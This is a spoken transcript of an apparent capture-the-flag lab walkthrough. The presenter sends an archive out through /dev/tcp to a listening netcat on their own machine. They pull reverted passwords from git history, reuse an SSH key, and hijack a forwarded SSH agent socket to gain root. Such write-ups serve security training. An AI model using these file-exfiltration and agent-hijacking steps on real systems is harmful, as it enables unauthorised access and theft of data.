us. So cat aogiri-chatapp.7zip to dev tcp 10.10.14.3 port 9001. Okay, we can nc lvnp 9001. This is going to be aogiri-app.7z. We need to direct it, run this, sent, and let's make dir app just in case this 7-zip doesn't go into its own directory and we don't like just put a bunch of files in our working directory. That is like one of my biggest pet peeves, when I unzip something and it just clobbers whatever directory I'm in. So 7zx aogiri ls. This is the chat app, and looks like, let's see, an ASCII script. We can look at it. That's bin sh. CD source. We got a Java application. It looks like, Jesus, so many directories. And you can look at the source of this app using Spring. Not too interesting. I don't even know where this chat app exists. So the first thing I'm going to do is try to get some information on it. We got a README. Replace the old PHP application because it sucked. Uses Spring Hibernate as well as others. Still doesn't tell me exactly where it is. So if I do like git log, we can see some funny messages. Updated README, updated dependencies, MySQL support. So this is when they first added MySQL. So we can do git diff and look at this, we see username Kaneki and a password. So we can also try SSHing into this. So let's go back out here and let's see. SSH Kaneki at 10.10.101-P2222. And this is going to be public key only. So let's see. We have to figure out where the root is. Whoops. This one, if we SSH to 172.20.0.1, let's see. Root at that. Looks like that requires public key. So I wonder if we have a key somewhere. ls, lsla, cd.s doesn't exist. Let's see. The only box we haven't got root on is 172.20.0.150, and we had an SSH tunnel listening on localhost 5001 to direct us there. So let's do ssh-i, docker uploads kaneki.key, kaneki _ pub at 10.10.10, 127.0.0.1, and this is port 5001. Yes, enter the passphrase. This is going to be this, and this probably just, okay, I did it correct. I'm surprised that it prompted me for the banner. Maybe I typed localhost last time. But now we're here. So what we can try is su dash to switch to the super root user. And let's look at this git diff again and try this password. So copy, paste, and it doesn't work. So let's do git log again and see what's here. So Kaneki did that. Let's see. Stop doing stupid crap. Let's definitely take a look at this one. Git log, git diff. What is this doing? I'm not exactly sure what that one's doing. There is also a git ref log, and this will show you things that may have been hidden or reverted. So if we look at git log, let's see. Around MySQL support, we have added readme MySQL hello world. If we look at git ref log, hello world, this, let's see. What am I supposed to be looking at? I thought this would be it. Let's just do it the lazy way. So open a new pane. Let's go back into the directory, split it vertically, and then we'll do git log, grep on commit, because I forget all the flags to do what I want it to do. And then we can do git ref log. App, aogiri-chatapp, git ref log. And then let's look at this. So starting out, we have 8B74, so that's good. Then we have BEC matches, 51D matches, ED5 matches, 813 matches, B37 matches. This doesn't. So once we get to this added service, we don't really see anything. So this is definitely a reverted commit. So we can do git log and see what this is, or git diff, see what this is, and we get a different password here. So we can try this one. So go back here, su dash, try the password, authentication failure. Let's see. Let's make sure I copy that correctly. thought that was it. Okay, we can keep going through this. So git ref log, we added added service, which was E2D. We get this 0D, that's also not there. So we can do git log or git diff this and see what's changing. Username is Kaneki. So maybe the username is Kaneki instead of Kaneki pub. So let's try su Kaneki su-u. Let's see. There's got to be a way to switch. -l. No passwd entry for Kaneki. Cat etsy passwd. Kaneki admin. We can try this. Authentication failure. We can try Kaneki admin with the other credential. Usernames. Did we? I know we copied it. Maybe we didn't. Let's go back. We got a password here. This one says root. So try su with Kaneki admin. Try just su. One of these times we will get it. So let's try a different log. And let's do the responsible thing and take notes of every password we've done or come across. So let's do PWs, paste that one. We did this G as well. Let's go back to this one and see what these passwords were. Git diff. And this is 7 something. Copy this. Su dash. Oh, there it is. Finally. So now we have root.txt. If we wc this, 110. I'm going to assume that is going to just be the hash. I'm going to cat the file, and if the video ends, I'll see you all next week. If the video goes on, there was a challenge in root.txt that I forgot about. So, and the video's not done. We still have another thing to do. You've done well to come up here, but what you seek isn't here. The journey isn't over. LSLA, oh man, I thought I was done. Let's go into Kaneki_admin and see if there's anything here. There is a .ssh directory, and let's see, cat authorized keys, Kaneki at Ubuntu, cat ID RSA. Hopefully this is going to be on like port 2222, because enumeration kept telling us we kept finding Docker containers. So let's do vd IDRSA, chmod 600 on that file, ssh-i, and we're going to what, 10.10.10.101, port 2222, and permission denied, public key. We can try Kaneki at this, Kaneki_adm, and that was weird. Okay, so if the user doesn't exist, it just closes us. That's fine. I'm just going to try Kaneki pub real quick. Make sure I didn't misenumerate or forget something. And the passphrase for this key is going to be I love Tuca, paste. Okay, so I'm guessing the challenge is we have to get to this box. So let's go see what we have here. Authorized keys, Kaneki. History is going to be blank, of course. su-lsla. On home, we got a history file. Come on. Let's see. It's SSHing to root. su-kaneki-adm. SSH root at 172.18.0.1 -p2222 -v. Yeah, it can't log in. And that can't log in either. So let's see. Let's check out who's currently logged in. Just us. For our log, do we have like an access log? Last log. Let's grep-i root -r. This is probably going to get a lot of hits. wtemp matches. Let's try Kaneki. And, oh, that screwed our terminal up. Type reset and then enter to fix that. That was wtemp. If we do last, we can see a bunch of logins. So now I'm beginning to remember the path. So if we go to etc ssh v ssh_config, we do have the forward agent feature. And this is kind of like a SSH single sign-on type thing. And it works mainly by being in /temp. Let's do lsla. Let's go back to root. So if I do exit, I should be root because I did an su to Kaneki admin. And let's go in temp. And I just did this because this is going to ensure that we are the root user. So if we do last, we can see about every maybe 5 minutes, we see a login. So if we do ls watch -n1 for 1 second, ls grep-v, and we're going to grep out a few things. I want to put this in double quotes, so this can be in single quotes. And we'll say we don't want this, we don't want this, and we don't want this. We don't want any of our active things. Okay. And then we also specify a double quote. Hit enter, and then we just wait for something new to pop up. It runs around every 5 minutes, and I think the last one was at like probably 11 or 12, so we'll just wait. I'll speed the video up and resume it as soon as we see something pop up. Oh, something popped up as I was talking. Sweet. So copy this, go into this directory, do an ls. It's 1440 ssh auth sock equals agent.1440 ssh root at 172.18.0.1 -p2222. And there we go. We have rode his session in. So what I was hoping to do while we wait would SSH agent man page or something. Let's see. There's got to be a good SSH agent thing. I'm not too familiar with SSH agents. SSH agent, how to configure. This is a good post to kind of explain it. But we're now root on this, wc-c root.text. There we go, 30 characters, which is 32 plus a line break. So let's see how this works. If we cat log.sh, it looks like it's just going to sleep for 50 seconds. So let's go to cron tab -l, no cron tab for root, verspool, cron, and then cron tabs. See if anyone has a specialized cron tab. Kaneki does. So let's see what Kaneki's is. Okay, every 6 minutes, he's going to execute login.sh. So go into Kaneki, cat, login.sh. Let's do this. So SSH agent looks like he's going to create one that is agent.cf. And then he's going to source it. So he sets this variable and then exports his thing. And then he's adding, let's see, it's SSH add. Identity added, and then SSH add -l is probably going to list. Okay. And then SSH TT, this is going to create a pseudo terminal, so it works in scripts. -A, this is going to be for forwarding SSH agents. And here is the SSH. So he's logging into 172.20.150 and then using that to log into 172.18.0.1. So I think we actually saw this way back in... Oh no, never mind. This is 18, not 20. Ignore what I said, but it's logging in and executing log.sh. Wait. So he's logging into 20.0.150. 20.0.150 is... Okay, I understand what's happening now. I thought he was going to do like a SSH login to the web server and then forward it to this guy, but what's happening? This is logging in 172.20.0.150. This is actually the box we were on. So if we do this, yes, this is kaneki-pc, and then from kaneki-pc, he is SSHing back into himself. So he's creating a circular loop because 172.18.0.1 is himself. He could also change this to 172.20.0.1. So, yeah, it's kind of weird how that cron is set up. It's goes from host box to we'll call this the jump box, and it forwards the SSH to this jump box and goes down here and then back over to the host box. So hopefully that makes sense. That is what the cron is doing. So it creates the SSH agent, and we intercepted here. And then when it does that, we also create a chain back to the host box. So hopefully that made sense. It's a little complicated or hard to explain, I think. But that is the box. Hope you guys enjoyed it. Take care, and I will see you all next week.